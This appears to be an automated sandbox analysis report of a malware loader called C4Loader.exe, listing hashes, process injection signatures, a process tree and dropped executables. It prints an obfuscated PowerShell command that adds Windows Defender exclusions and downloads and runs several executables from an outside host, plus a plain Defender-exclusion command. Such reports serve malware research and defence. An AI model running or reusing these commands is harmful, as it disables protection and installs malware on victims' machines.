cde83c58766ae18bd516cfa78098c411fd1d0ebff083896f35fc33b10afa0e50

General

Target

C4Loader.exe
Size

495KB
MD5

e52e99d4ce81f3075dd62ca10f0aba86
SHA1

c0e73bfc58b42bf9e02ea126fa842bc7a128f56b
SHA256

cde83c58766ae18bd516cfa78098c411fd1d0ebff083896f35fc33b10afa0e50
SHA512

b7f735bf1e10723f56f36673a802a4f9dc1986682d95c1038404cbc7f2c1f437bbd2ad056691caa0a2b99b6c3efe180b72224f3a3b43f11eec46491db243be80
SSDEEP

12288:x5z183Z0RwnuD9VHG5m6b+5rPuAaD2H5nKr3:lG0qm6oro2H5nM

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

SmartDefRun.exe

description pid process target process

PID 536 created 1252 536 SmartDefRun.exe Explorer.EXE
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1348 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

new2.exeSmartDefRun.exe

pid process

1620 new2.exe
536 SmartDefRun.exe
Loads dropped DLL 5 IoCs

Processes:

powershell.exe

pid process

1348 powershell.exe
1348 powershell.exe
1348 powershell.exe
1348 powershell.exe
1348 powershell.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

C4Loader.exe

description pid process target process

PID 1276 set thread context of 2032 1276 C4Loader.exe vbc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1976 1276 WerFault.exe C4Loader.exe

description	pid	process	target process
PID 536 created 1252	536	SmartDefRun.exe	Explorer.EXE

flow	pid	process
4	1348	powershell.exe

pid	process
1620	new2.exe
536	SmartDefRun.exe

description	pid	process	target process
PID 1276 set thread context of 2032	1276	C4Loader.exe	vbc.exe

pid	pid_target	process	target process
1976	1276	WerFault.exe	C4Loader.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exeSmartDefRun.exe

pid	process
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
536	SmartDefRun.exe
536	SmartDefRun.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1348 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1348	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

C4Loader.exevbc.exepowershell.exe

description	pid	process	target process
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 2032	1276	C4Loader.exe	vbc.exe
PID 1276 wrote to memory of 1976	1276	C4Loader.exe	WerFault.exe
PID 1276 wrote to memory of 1976	1276	C4Loader.exe	WerFault.exe
PID 1276 wrote to memory of 1976	1276	C4Loader.exe	WerFault.exe
PID 1276 wrote to memory of 1976	1276	C4Loader.exe	WerFault.exe
PID 2032 wrote to memory of 1348	2032	vbc.exe	powershell.exe
PID 2032 wrote to memory of 1348	2032	vbc.exe	powershell.exe
PID 2032 wrote to memory of 1348	2032	vbc.exe	powershell.exe
PID 2032 wrote to memory of 1348	2032	vbc.exe	powershell.exe
PID 1348 wrote to memory of 1064	1348	powershell.exe	C4Loader.exe
PID 1348 wrote to memory of 1064	1348	powershell.exe	C4Loader.exe
PID 1348 wrote to memory of 1064	1348	powershell.exe	C4Loader.exe
PID 1348 wrote to memory of 1064	1348	powershell.exe	C4Loader.exe
PID 1348 wrote to memory of 1620	1348	powershell.exe	new2.exe
PID 1348 wrote to memory of 1620	1348	powershell.exe	new2.exe
PID 1348 wrote to memory of 1620	1348	powershell.exe	new2.exe
PID 1348 wrote to memory of 1620	1348	powershell.exe	new2.exe
PID 1348 wrote to memory of 392	1348	powershell.exe	SysApp.exe
PID 1348 wrote to memory of 392	1348	powershell.exe	SysApp.exe
PID 1348 wrote to memory of 392	1348	powershell.exe	SysApp.exe
PID 1348 wrote to memory of 392	1348	powershell.exe	SysApp.exe
PID 1348 wrote to memory of 536	1348	powershell.exe	SmartDefRun.exe
PID 1348 wrote to memory of 536	1348	powershell.exe	SmartDefRun.exe
PID 1348 wrote to memory of 536	1348	powershell.exe	SmartDefRun.exe
PID 1348 wrote to memory of 536	1348	powershell.exe	SmartDefRun.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1252

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
PID:1064

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
PID:1620

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
PID:392

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 52
3⤵
- Program crash
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
memory/392-76-0x0000000000000000-mapping.dmp

Download
memory/392-81-0x0000000001EF0000-0x00000000023F4000-memory.dmp

Filesize
5.0MB

Download
memory/536-78-0x0000000000000000-mapping.dmp

Download
memory/1064-69-0x0000000000000000-mapping.dmp

Download
memory/1348-66-0x0000000000000000-mapping.dmp

Download
memory/1348-68-0x0000000073500000-0x0000000073AAB000-memory.dmp

Filesize
5.7MB

Download
memory/1348-80-0x0000000073500000-0x0000000073AAB000-memory.dmp

Filesize
5.7MB

Download
memory/1620-72-0x0000000000000000-mapping.dmp

Download
memory/1976-65-0x0000000000000000-mapping.dmp

Download
memory/2032-56-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2032-62-0x0000000000401159-mapping.dmp

Download
memory/2032-54-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2032-64-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2032-63-0x0000000075E01000-0x0000000075E03000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing